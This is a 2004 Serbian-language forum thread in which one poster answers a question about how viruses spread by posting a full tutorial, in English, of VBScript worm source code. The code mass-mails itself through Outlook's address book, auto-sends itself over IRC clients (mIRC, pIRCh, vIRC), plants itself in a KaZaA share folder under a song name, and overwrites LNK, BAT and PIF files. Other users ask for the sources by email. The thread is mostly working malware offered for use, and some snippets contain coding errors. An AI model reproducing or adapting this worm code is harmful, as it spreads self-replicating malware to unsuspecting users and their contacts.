Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.

Preko cega sve virus moze da se siri i kako se siri ?

[es] :: Zaštita :: Preko cega sve virus moze da se siri i kako se siri ?

[ Pregleda: 3407 | Odgovora: 4 ] > FB > Twit

Postavi temu Odgovori

Autor

Pretraga teme: Traži
Markiranje Štampanje RSS

reiser

Član broj: 7895
Poruke: 2314



+102 Profil

icon Preko cega sve virus moze da se siri i kako se siri ?04.04.2004. u 21:23 - pre 215 meseci
Na koje sve nacine jedan virus moze da se siri ? Preko maila, LAN-a, Kazaa... ?
I kako se virus siri preko kazaa programa, tj. na koji nacin to funkcionise ? Kazaa je 7 i kusur megabajta, mrzi me da je downloadujem.

Cheers.
 
Odgovor na temu

VRKY

Član broj: 21087
Poruke: 4690
*.net.htnet.hr



+8 Profil

icon Re: Preko cega sve virus moze da se siri i kako se siri ?04.04.2004. u 21:48 - pre 215 meseci
1.) eMail spreading
2.) mIRC spreading
3.) pIRCh spreading
4.) vIRC spreading
5.) KaZaA spreading
6.) LNK dropping
7.) BAT dropping
8.) PIF dropping

ja te znam,i imam njihove sourcre codove za VB

1.) eMail spreading
The Virus searchs for every email adress in the addressbook. Then sending itself to these addresses.
It's really easy, I think.

2.) mIRC spreading
First The virus copies itself to C:\mirc\attachment.vbs
Then it canges the mIRC-script.ini file. So every user in the same chatroom gets an infect file.

3.) pIRCh spreading
It's the same as mIRC spreading. First the worm made a copy of itself in the pIRCh direction (C:\pirch98),
then changes the event.ini file, so every user get an infect file.

4.) vIRC spreading
First you need a copy of the virus, than change a registry key.
That's all...

5.) KaZaA spreading
First the virus makes a copy of itself to C:\vbs.vbs
Then it generates a LNK file, which opens the C:\vbs.vbs-file.
Then the virus makes a batch file, which copies the LNK-file to every LNK file it can find.

6.) LNK dropping
First the virus makes a copy of itself to C:\vbs.vbs
Then it generates a LNK file, which opens the C:\vbs.vbs-file.
Then the virus makes a batch file, which copies the LNK-file to every LNK file it can find


7.) BAT dropping
First the virus copies itself to C:\vbs.vbs. Than it generates a batch-file (C:\bat.bat) which opens the virus-copy.
Than te virus generates a second batch file, which copies the first one to every batch-files it can find.

8.) PIF dropping
First the virus copies itself to C:\vbs.vbs. Than it generates a batch file, which opens the virus.
Than it generates a PIF file, which opens the batch file. You can see, that the code should generates a LNK,
but VBS "know" that BAT is a DOS file, so it makes a DOS-ShourtCut, and that's PIF.
Ok, go on, the vbs file generates a second BAT file, which copies the PIF to every PIF-file, it can find.

 
Odgovor na temu

reiser

Član broj: 7895
Poruke: 2314



+102 Profil

icon Re: Preko cega sve virus moze da se siri i kako se siri ?05.04.2004. u 15:34 - pre 215 meseci
Posalji mi sourcove za mIRC i Kazaa ako mozes.
(vanilli @ beotel.net)
 
Odgovor na temu

Lucas
Luka Mladenovic
not yet
ZSICG, BG, dedinje

Član broj: 9299
Poruke: 16
*.246.EUnet.yu

Sajt: www.undergroundgate.org


Profil

icon Re: Preko cega sve virus moze da se siri i kako se siri ?18.04.2004. u 11:19 - pre 214 meseci
ajde posalji i meni sorceve za mirc i kazu

luka.m @ eunet.yu
Originally posted by Lucas
http://www.undergroundgate.org
 
Odgovor na temu

VRKY

Član broj: 21087
Poruke: 4690
*.net.htnet.hr



+8 Profil

icon Re: Preko cega sve virus moze da se siri i kako se siri ?06.05.2004. u 21:39 - pre 214 meseci
Evo vam sve
Perfect Internet-Worm via VisualBasic Script

Now i wanna show you 8 of the best VBS techniques to spread a worm...

1.) eMail spreading
2.) mIRC spreading
3.) pIRCh spreading
4.) vIRC spreading
5.) KaZaA spreading
6.) LNK dropping
7.) BAT dropping
8.) PIF dropping

*************************************************************************************************
1.) eMail spreading


First you'll find the eMail-spreading-source:
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +

Dim x
on error resume next
Set fso ="Scripting.FileSystem.Object"
Set so=CreateObject(fso)
Set ol=CreateObject("Outlook.Application")
Set out= WScript.CreateObject("Outlook.Application")
Set mapi = out.GetNameSpace("MAPI")
Set a = mapi.AddressLists(1)
For x=1 To a.AddressEntries.Count
Set Mail=ol.CreateItem(0)
Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)
Mail.Subject="Subject"
Mail.Body="Body"
Mail.Attachments.Add Wscript.ScriptFullName
Mail.Send
Next
ol.Quit


+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
The Virus searchs for every email adress in the addressbook. Then sending itself to these addresses.
It's really easy, I think.


*************************************************************************************************
2.) mIRC spreading

The source first:
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +

Dim mirc
set fso=CreateObject("Scripting.FileSystemObject")
set mirc=fso.CreateTextFile("C:\mirc\script.ini")
fso.CopyFile Wscript.ScriptFullName, "C:\mirc\attachment.vbs", True
mirc.WriteLine "[script]"
mirc.WriteLine "n0=on 1:join:*.*: { if ( $nick !=$me ) {halt} /dcc send $nick C:\mirc\attachment.vbs }
mirc.Close

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
First The virus copies itself to C:\mirc\attachment.vbs
Then it canges the mIRC-script.ini file. So every user in the same chatroom gets an infect file.



*************************************************************************************************
3.) pIRCh spreading

Source:
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +


Dim pirch
set fso=CreateObject("Scripting.FileSystemObject")
set mirc=fso.CreateTextFile("C:\pirch98\events.ini")
fso.CopyFile Wscript.ScriptFullName, "C:\mirc\attachment.vbs", True
pirch.WriteLine "[Levels]");
pirch.WriteLine "Enabled=1");
pirch.WriteLine "Count=6");
pirch.WriteLine "Level1=000-Unknows"
pirch.WriteLine "000-UnknowsEnabled=1"
pirch.WriteLine "Level2=100-Level 100"
pirch.WriteLine "100-Level 100Enabled=1"
pirch.WriteLine "Level3=200-Level 200"
pirch.WriteLine "200-Level 200Enabled=1"
pirch.WriteLine "Level4=300-Level 300"
pirch.WriteLine "300-Level 300Enabled=1"
pirch.WriteLine "Level5=400-Level 400"
pirch.WriteLine "400-Level 400Enabled=1"
pirch.WriteLine "Level6=500-Level 500"
pirch.WriteLine "500-Level 500Enabled=1"
pirch.WriteLine "[000-Unknowns]"
pirch.WriteLine "User1=*!*@*"
pirch.WriteLine "UserCount=1"
pirch.WriteLine "Events1=ON JOIN:#: /dcc send $nick C:\Pirch98\attachement.vbs"
pirch.WriteLine "EventCount=1"
pirch.WriteLine "[100-Level 100]"
pirch.WriteLine "UserCount=0"
pirch.WriteLine "EventCount=0"
pirch.WriteLine "[200-Level 200]"
pirch.WriteLine "UserCount=0"
pirch.WriteLine "EventCount=0"
pirch.WriteLine "[300-Level 300]"
pirch.WriteLine "UserCount=0"
pirch.WriteLine "EventCount=0"
pirch.WriteLine "[400-Level 400]"
pirch.WriteLine "UserCount=0"
pirch.WriteLine "EventCount=0"
pirch.WriteLine "[500-Level 500]"
pirch.WriteLine "UserCount=0"
pirch.WriteLine "EventCount=0"
pirch.Close

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
It's the same as mIRC spreading. First the worm made a copy of itself in the pIRCh direction (C:\pirch98),
then changes the event.ini file, so every user get an infect file.



*************************************************************************************************
4.) vIRC spreading

VBS vIRC source:
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +

set fso=CreateObject("Scripting.FileSystemObject")
fso.CopyFile Wscript.ScriptFullName, "C:\Virc\attachment.vbs", True
set shell=CreateObject("WScript.Shell")
shell RegWrite "HKEY_CURRENT_USER\.Default\Software\MeGaLiTh Software\Visual IRC 96\Events\Event17", "dcc send $nick C:\Virc\attachment.vbs"


+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
It's a really short code. First you need a copy of the virus, than change a registry key.
That's all...



*************************************************************************************************
5.) KaZaA spreading

Source:
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +


set fso=CreateObject("Scripting.FileSystemObject")
fso.CopyFile Wscript.ScriptFullName, "C:\Kazaa\Nirvana - You Know You Are Right.vbs", True
set shell=CreateObject("WScript.Shell")

shell.RegWrite "HKLM\\Software\\KaZaA\\Transfer\\DlDir0", "C:\Kazaa");

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
You make a copy of the virus in the C:\Kazaa-direction.
Then make a registry-key. Every file in the direction (here it is "C:\kazaa\") other user can download.
I think, you will understand it.



*************************************************************************************************
6.) LNK dropping


Dropping means, that every LNK file opens the virus. Look at the code:
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +

Dim shell, msc, batch, fso
set fso=CreateObject("Scripting.FileSystemObject")
fso.CopyFile Wscript.ScriptFullName, "C:\vbs.vbs", True
set shell=wscript.createobject("wscript.shell")
set msc=shell.CreateShortCut("C:\vbs.lnk")
msc.TargetPath=shell.ExpandEnvironment("C:\vbs.vbs")
msc.WindowStyle=4
msc.Save
set batch=fso.CreateTextFile("C:\lnk.bat")
batch.WriteLine "cls"
batch.WriteLine "@echo off"
batch.WriteLine "for %%a in (*.lnk ..\*.lnk \*.lnk %path%\*.lnk %tmp%\*.lnk %temp%\*.lnk %windir%\*.lnk) do copy C:\vbs.lnk %%a"
batch.Close
shell.Run "C:\lnk.bat"

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
First the virus makes a copy of itself to C:\vbs.vbs
Then it generates a LNK file, which opens the C:\vbs.vbs-file.
Then the virus makes a batch file, which copies the LNK-file to every LNK file it can find.



*************************************************************************************************
7.) BAT dropping

Source first:
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +

Dim shell, batcha, batchb, fso
set fso=CreateObject("Scripting.FileSystemObject")
fso.CopyFile Wscript.ScriptFullName, "C:\vbs.vbs", True
set batcha=fso.CreateTextFile("C:\bat.bat")
batcha.WriteLine "cls"
batcha.WriteLine "@echo off"
batcha.WriteLine "cscript C:\vbs.vbs"
batcha.Close
set batchb=CreateTextFile("C:\bata.bat")
batchb.WriteLine "cls"
batchb.WriteLine "@echo off"
batchb.WriteLine "for %%a in (*.bat ..\*.bat \*.bat %path%\*.bat %tmp%\*.bat %temp%\*.bat %windir%\*.bat) do copy C:\bat.bat %%a"
batchb.Close
shell.Run "C:\lnk.bat"

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
First the virus copies itself to C:\vbs.vbs. Than it generates a batch-file (C:\bat.bat) which opens the virus-copy.
Than te virus generates a second batch file, which copies the first one to every batch-files it can find.




*************************************************************************************************
8.) PIF dropping

PIF files open DOS-files. Yes, but VBS is a windows file?? what to do?
Source:
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +

Dim shell, msc, batch, fso, batchb
set fso=CreateObject("Scripting.FileSystemObject")
fso.CopyFile Wscript.ScriptFullName, "C:\vbs.vbs", True
set batch=CreateTextFile("C:\bat.bat")
batch.WriteLine "cls"
batch.WriteLine "@echo off"
batch.WriteLine "cscript C:\vbs.vbs"
batch.Close
set shell=wscript.createobject("wscript.shell")
set msc=shell.CreateShortCut("C:\pif.lnk")
msc.TargetPath=shell.ExpandEnvironment("C:\bat.bat")
msc.WindowStyle=4
msc.Save
set batchb=CreaateTextFile("C:\pif.bat")
batchb.WriteLine "cls"
batchb.WriteLine "@echo off"
batchb.WriteLine "for %%a in (*.pif ..\*.pif \*.pif %path%\*.pif %tmp%\*.pif %temp%\*.pif %windir%\*.pif) do copy C:\pif.pif %%a"
batchb.Close
shell.Run "C:\pif.bat"

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +

First the virus copies itself to C:\vbs.vbs. Than it generates a batch file, which opens the virus.
Than it generates a PIF file, which opens the batch file. You can see, that the code should generates a LNK,
but VBS "know" that BAT is a DOS file, so it makes a DOS-ShourtCut, and that's PIF.
Ok, go on, the vbs file generates a second BAT file, which copies the PIF to every PIF-file, it can find.
 
Odgovor na temu

[es] :: Zaštita :: Preko cega sve virus moze da se siri i kako se siri ?

[ Pregleda: 3407 | Odgovora: 4 ] > FB > Twit

Postavi temu Odgovori

Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.